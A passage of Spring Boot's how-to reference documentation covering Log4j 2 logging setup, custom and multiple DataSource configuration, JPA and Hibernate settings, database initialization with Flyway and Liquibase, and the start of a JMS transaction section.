https:\/\/logging.apache.org\/log4j\/2.x[Log4j 2] for logging\nconfiguration if it is on the classpath. If you use the starters for\nassembling dependencies, you have to exclude Logback and then include log4j 2\ninstead. If you do not use the starters, you need to provide (at least) `spring-jcl` in\naddition to Log4j 2.\n\nThe simplest path is probably through the starters, even though it requires some\njiggling with excludes. The following example shows how to set up the starters in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-logging<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-log4j2<\/artifactId>\n\t<\/dependency>\n----\n\nAnd the following example shows one way to set up the starters in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile 'org.springframework.boot:spring-boot-starter-log4j2'\n\t}\n\n\tconfigurations {\n\t\tall {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-logging'\n\t\t}\n\t}\n----\n\nNOTE: The Log4j starters gather together the dependencies for common logging\nrequirements (such as having Tomcat use `java.util.logging` but configuring the\noutput using Log4j 2). See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-actuator-log4j2[Actuator Log4j 2]\nsamples for more detail and to see it in action.\n\nNOTE: To ensure that debug logging performed using `java.util.logging` is routed into\nLog4j 2, configure its https:\/\/logging.apache.org\/log4j\/2.0\/log4j-jul\/index.html[JDK\nlogging adapter] by setting the `java.util.logging.manager` system property to\n`org.apache.logging.log4j.jul.LogManager`.\n\n\n\n[[howto-configure-log4j-for-logging-yaml-or-json-config]]\n==== Use YAML or JSON to Configure Log4j 2\nIn addition to its default XML configuration format, Log4j 2 also supports YAML and JSON\nconfiguration files. To configure Log4j 2 to use an alternative configuration file format,\nadd the appropriate dependencies to the classpath and name your\nconfiguration files to match your chosen file format, as shown in the following example:\n\n[cols=\"10,75,15\"]\n|===\n|Format|Dependencies|File names\n\n|YAML\na| `com.fasterxml.jackson.core:jackson-databind` +\n `com.fasterxml.jackson.dataformat:jackson-dataformat-yaml`\na| `log4j2.yaml` +\n `log4j2.yml`\n\n|JSON\na| `com.fasterxml.jackson.core:jackson-databind`\na| `log4j2.json` +\n `log4j2.jsn`\n|===\n\n[[howto-data-access]]\n== Data Access\n\nSpring Boot includes a number of starters for working with data sources. This section\nanswers questions related to doing so.\n\n[[howto-configure-a-datasource]]\n=== Configure a Custom DataSource\nTo configure your own `DataSource`, define a `@Bean` of that type in your configuration.\nSpring Boot reuses your `DataSource` anywhere one is required, including database\ninitialization. If you need to externalize some settings, you can bind your\n`DataSource` to the environment (see\n\"`<<spring-boot-features.adoc#boot-features-external-config-3rd-party-configuration>>`\").\n\nThe following example shows how to define a data source in a bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@ConfigurationProperties(prefix=\"app.datasource\")\n\tpublic DataSource dataSource() {\n\t\treturn new FancyDataSource();\n\t}\n----\n\nThe following example shows how to define a data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:h2:mem:mydb\n\tapp.datasource.username=sa\n\tapp.datasource.pool-size=30\n----\n\nAssuming that your `FancyDataSource` has regular JavaBean properties for the URL, the\nusername, and the pool size, these settings are bound automatically before the\n`DataSource` is made available to other components. The regular\n<<howto-initialize-a-database-using-spring-jdbc,database initialization>> also happens\n(so the relevant sub-set of `spring.datasource.*` can still be used with your custom\nconfiguration).\n\nSpring Boot also provides a utility builder class, called `DataSourceBuilder`, that can\nbe used to create one of the standard data sources (if it is on the classpath). The\nbuilder can detect the one to use based on what's available on the classpath. It also\nauto-detects the driver based on the JDBC URL.\n\nThe following example shows how to create a data source by using a `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/BasicDataSourceExample.java[tag=configuration]\n----\n\nTo run an app with that `DataSource`, all you need is the connection\ninformation. Pool-specific settings can also be provided. Check the implementation that\nis going to be used at runtime for more details.\n\nThe following example shows how to define a JDBC data source by setting properties:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.pool-size=30\n----\n\nHowever, there is a catch. Because the actual type of the connection pool is not exposed,\nno keys are generated in the metadata for your custom `DataSource` and no completion is\navailable in your IDE (because the `DataSource` interface exposes no properties). Also, if\nyou happen to have Hikari on the classpath, this basic setup does not work, because Hikari\nhas no `url` property (but does have a `jdbcUrl` property). In that case, you must rewrite\nyour configuration as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.jdbc-url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.maximum-pool-size=30\n----\n\nYou can fix that by forcing the connection pool to use and return a dedicated\nimplementation rather than `DataSource`. You cannot change the implementation\nat runtime, but the list of options will be explicit.\n\nThe following example shows how create a `HikariDataSource` with `DataSourceBuilder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleDataSourceExample.java[tag=configuration]\n----\n\nYou can even go further by leveraging what `DataSourceProperties` does for you -- that is,\nby providing a default embedded database with a sensible username and password if no URL\nis provided. You can easily initialize a `DataSourceBuilder` from the state of any\n`DataSourceProperties` object, so you could also inject the DataSource that Spring Boot\ncreates automatically. However, that would split your configuration into two namespaces:\n`url`, `username`, `password`, `type`, and `driver` on `spring.datasource` and the rest on\nyour custom namespace (`app.datasource`). To avoid that, you can redefine a custom\n`DataSourceProperties` on your custom namespace, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/ConfigurableDataSourceExample.java[tag=configuration]\n----\n\nThis setup puts you _in sync_ with what Spring Boot does for you by default, except that\na dedicated connection pool is chosen (in code) and its settings are exposed in the\n`app.datasource.configuration` sub namespace. Because `DataSourceProperties` is taking\ncare of the `url`\/`jdbcUrl` translation for you, you can configure it as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tapp.datasource.username=dbuser\n\tapp.datasource.password=dbpass\n\tapp.datasource.configuration.maximum-pool-size=30\n----\n\nTIP: Spring Boot will expose Hikari-specific settings to `spring.datasource.hikari`. This\nexample uses a more generic `configuration` sub namespace as the example does not support\nmultiple datasource implementations.\n\nNOTE: Because your custom configuration chooses to go with Hikari, `app.datasource.type`\nhas no effect. In practice, the builder is initialized with whatever value you\nmight set there and then overridden by the call to `.type()`.\n\nSee \"`<<spring-boot-features.adoc#boot-features-configure-datasource>>`\" in the\n\"`Spring Boot features`\" section and the\n{sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[`DataSourceAutoConfiguration`]\nclass for more details.\n\n\n\n[[howto-two-datasources]]\n=== Configure Two DataSources\nIf you need to configure multiple data sources, you can apply the same tricks that are\ndescribed in the previous section. You must, however, mark one of the `DataSource`\ninstances as `@Primary`, because various auto-configurations down the road expect to be\nable to get one by type.\n\nIf you create your own `DataSource`, the auto-configuration backs off. In the following\nexample, we provide the _exact_ same feature set as the auto-configuration provides\non the primary data source:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/SimpleTwoDataSourcesExample.java[tag=configuration]\n----\n\nTIP: `firstDataSourceProperties` has to be flagged as `@Primary` so that the database\ninitializer feature uses your copy (if you use the initializer).\n\nBoth data sources are also bound for advanced customizations. For instance, you could\nconfigure them as follows:\n\n[source,properties,indent=0]\n----\n\tapp.datasource.first.url=jdbc:mysql:\/\/localhost\/first\n\tapp.datasource.first.username=dbuser\n\tapp.datasource.first.password=dbpass\n\tapp.datasource.first.configuration.maximum-pool-size=30\n\n\tapp.datasource.second.url=jdbc:mysql:\/\/localhost\/second\n\tapp.datasource.second.username=dbuser\n\tapp.datasource.second.password=dbpass\n\tapp.datasource.second.max-total=30\n----\n\nYou can apply the same concept to the secondary `DataSource` as well, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/jdbc\/CompleteTwoDataSourcesExample.java[tag=configuration]\n----\n\nThe preceding example configures two data sources on custom namespaces with the same\nlogic as Spring Boot would use in auto-configuration. Note that each `configuration` sub\nnamespace provides advanced settings based on the chosen implementation.\n\n\n\n[[howto-use-spring-data-repositories]]\n=== Use Spring Data Repositories\nSpring Data can create implementations of `@Repository` interfaces of various flavors.\nSpring Boot handles all of that for you, as long as those `@Repositories` are included in\nthe same package (or a sub-package) of your `@EnableAutoConfiguration` class.\n\nFor many applications, all you need is to put the right Spring Data dependencies on\nyour classpath (there is a `spring-boot-starter-data-jpa` for JPA and a\n`spring-boot-starter-data-mongodb` for Mongodb) and create some repository interfaces to\nhandle your `@Entity` objects. Examples are in the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-jpa[JPA sample] and the\n{github-code}\/spring-boot-samples\/spring-boot-sample-data-mongodb[Mongodb sample].\n\nSpring Boot tries to guess the location of your `@Repository` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, use the `@EnableJpaRepositories`\nannotation (from Spring Data JPA).\n\nFor more about Spring Data, see the {spring-data}[Spring Data project page].\n\n\n\n[[howto-separate-entity-definitions-from-spring-configuration]]\n=== Separate @Entity Definitions from Spring Configuration\nSpring Boot tries to guess the location of your `@Entity` definitions, based on the\n`@EnableAutoConfiguration` it finds. To get more control, you can use the `@EntityScan`\nannotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableAutoConfiguration\n\t@EntityScan(basePackageClasses=City.class)\n\tpublic class Application {\n\n\t\t\/\/...\n\n\t}\n----\n\n\n\n[[howto-configure-jpa-properties]]\n=== Configure JPA Properties\nSpring Data JPA already provides some vendor-independent configuration options (such as\nthose for SQL logging), and Spring Boot exposes those options and a few more for Hibernate\nas external configuration properties. Some of them are automatically detected according to\nthe context so you should not have to set them.\n\nThe `spring.jpa.hibernate.ddl-auto` is a special case, because, depending on runtime\nconditions, it has different defaults. If an embedded database is used and no schema\nmanager (such as Liquibase or Flyway) is handling the `DataSource`, it defaults to\n`create-drop`. In all other cases, it defaults to `none`.\n\nThe dialect to use is also automatically detected based on the current `DataSource`, but\nyou can set `spring.jpa.database` yourself if you want to be explicit and bypass that\ncheck on startup.\n\nNOTE: Specifying a `database` leads to the configuration of a well-defined Hibernate\ndialect. Several databases have more than one `Dialect`, and this may not suit your needs.\nIn that case, you can either set `spring.jpa.database` to `default` to let Hibernate\nfigure things out or set the dialect by setting the `spring.jpa.database-platform`\nproperty.\n\nThe most common options to set are shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=com.example.MyPhysicalNamingStrategy\n\tspring.jpa.show-sql=true\n----\n\nIn addition, all properties in `+spring.jpa.properties.*+` are passed through as normal\nJPA properties (with the prefix stripped) when the local `EntityManagerFactory` is\ncreated.\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider\nregistering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating\nthe `EntityManagerFactory`. This takes precedence to anything that is applied by the\nauto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-documentation}#naming[two different naming strategies] to map\nnames from the object model to the corresponding database names. The fully qualified\nclass name of the physical and the implicit strategy implementations can be configured by\nsetting the `spring.jpa.hibernate.naming.physical-strategy` and\n`spring.jpa.hibernate.naming.implicit-strategy` properties, respectively. Alternatively,\nif `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the\napplication context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with\n`SpringPhysicalNamingStrategy`. This implementation provides the same table structure as\nHibernate 4: all dots are replaced by underscores and camel casing is replaced by\nunderscores as well. By default, all table names are generated in lower case, but it is\npossible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[`HibernateJpaAutoConfiguration`]\nand {sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-documentation}#caching[second-level cache] can be configured for a\nrange of cache providers. Rather than configuring Hibernate to lookup the cache provider\nagain, it is better to provide the one that is available in the context whenever possible.\n\nIf you're using JCache, this is pretty easy. First, make sure that\n`org.hibernate:hibernate-jcache` is available on the classpath. Then, add a\n`HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that\nthe application uses. It is also possible to use separate `CacheManager` instances. For\ndetails, refer to {hibernate-documentation}#caching-provider-jcache[the Hibernate user\nguide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the\n`BeanFactory` so that converters and entity listeners can use regular dependency\ninjection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer`\nthat removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add\na `@Bean` named '`entityManagerFactory`'. Spring Boot auto-configuration switches off its\nentity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the\ndefault. To make it easy to do, you can use the convenient `EntityManagerBuilder`\nprovided by Spring Boot. Alternatively, you can just the\n`LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nThe configuration above almost works on its own. To complete the picture, you need to\nconfigure `TransactionManagers` for the two `EntityManagers` as well. If you mark one of\nthem as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring\nBoot. The other would have to be explicitly injected into a new instance. Alternatively,\nyou might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly,\nas shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional `persistence.xml` File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of\ntype `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the\npersistence unit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\n\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository`\nimplementations for you. If they are both present on the classpath, you might have to do\nsome extra configuration to tell Spring Boot which repositories to create. The most\nexplicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and\n`+@EnableMongoRepositories+` annotations and provide the location of your `Repository`\ninterfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and\n`+spring.data.*.repositories.type+`) that you can use to switch the auto-configured\nrepositories on and off in external configuration. Doing so is useful, for instance, in\ncase you want to switch off the Mongo repositories and still use the auto-configured\n`MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr, and others). To work with them, change the names of\nthe annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a\nweb application. Spring Boot provides properties in the `spring.data.web` namespace\nfor customizing its configuration. Note that if you are using Spring Data REST, you must\nuse the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace)\nthat customize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs\nafter the one Spring Boot uses internally. If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure\nthat the component is initialized before JPA. When the component is auto-configured,\nSpring Boot takes care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that Flyway has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you use Hibernate Search with\nElasticsearch as its index manager, any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each one. Refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to use a single mechanism for schema generation.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\nindependent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\nbehavior in a more fine-grained way. This feature is described in more detail later in\nthis guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, and `create-drop`. Spring Boot chooses\na default value for you based on whether it thinks your database is embedded. It defaults\nto `create-drop` if no schema manager has been detected or `none` in all other cases. An\nembedded database is detected by looking at the `Connection` type. `hsqldb`, `h2`, and\n`derby` are embedded, and others are not. Be careful when switching from in-memory to a\n'`real`' database that you do not make assumptions about the existence of the tables and\ndata in the new platform. You either have to set `ddl-auto` explicitly or use one of the\nother mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the\n<<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on\nstartup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts). It loads SQL from the standard root classpath locations:\n`schema.sql` and `data.sql`, respectively. In addition, Spring Boot processes the\n`schema-$\\{platform}.sql` and `data-$\\{platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to\ndatabase-specific scripts if necessary. For example, you might choose to set it to the\nvendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nSpring Boot automatically creates the schema of an embedded `DataSource`. This behaviour\ncan be customized by using the `spring.datasource.initialization-mode` property. For\ninstance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer. This\nmeans that, if the scripts cause exceptions, the application fails to start. You can tune\nthat behavior by setting `spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql`, but you cannot do both. Make sure to disable\n`spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most\npopular database platforms. Spring Boot can detect your database type and execute those\nscripts on startup. If you use an embedded database, this happens by default. You can also\nenable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting\n`spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway]\nand https:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, such as '`1`' or '`2_1`'). By default, they are in a folder\ncalled `classpath:db\/migration`, but you can modify that location by setting\n`spring.flyway.locations`. This is a comma-separated list of one or more `classpath:`\nor `filesystem:` locations. For example, the following configuration would search for\nscripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `\\{vendor}` placeholder to use vendor-specific scripts. Assume\nthe following:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration\/\\{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the folder to use\naccording to the type of the database (such as `db\/migration\/mysql` for MySQL). The list\nof supported databases is available in\n{sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nprovides most of Flyway's settings and a small set of additional properties that can be\nused to disable the migrations or switch off the location checking. If you need more\ncontrol over the configuration, consider registering a `FlywayConfigurationCustomizer`\nbean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration`\nfolder. To use Java-based callbacks, create one or more beans that implement\n`Callback`. Any such beans are automatically registered with `Flyway`. They can be\nordered by using `@Order` or by implementing `Ordered`. Beans that implement the\ndeprecated `FlywayCallback` interface can also be detected, however they cannot be used\nalongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and\nuses that for migrations. If you like to use a different `DataSource`, you can create\none and mark its `@Bean` as `@FlywayDataSource`. If you do so and want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nFlyway's native `DataSource` by setting `spring.flyway.[url,user,password]`\nin external properties. Setting either `spring.flyway.url` or `spring.flyway.user`\nis sufficient to cause Flyway to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nthat you can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they are run only when your\napplication starts for testing. Also, you can use profile-specific configuration to\ncustomize `spring.flyway.locations` so that certain migrations run only when a particular\nprofile is active. For example, in `application-dev.properties`, you might specify the\nfollowing setting:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is\nactive.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add the\n`org.liquibase:liquibase-core` to your classpath.\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`,\nbut you can change the location by setting `spring.liquibase.change-log`. In addition to\nYAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses\nthat for migrations. If you need to use a different `DataSource`, you can create one and\nmark its `@Bean` as `@LiquibaseDataSource`. If you do so and you want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nLiquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in\nexternal properties. Setting either `spring.liquibase.url` or `spring.liquibase.user`\nis sufficient to cause Liquibase to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details about available settings such as contexts, the default schema, and others.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase\nsample] so that you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\nSpring Boot offers a number of starters that include messaging. This section answers\nquestions that arise from using messaging with Spring Boot.\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the\nsupport of transactions altogether. If you create your own `JmsListenerContainerFactory`,\nthere is nothing to do, since, by default it cannot be transacted. If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn 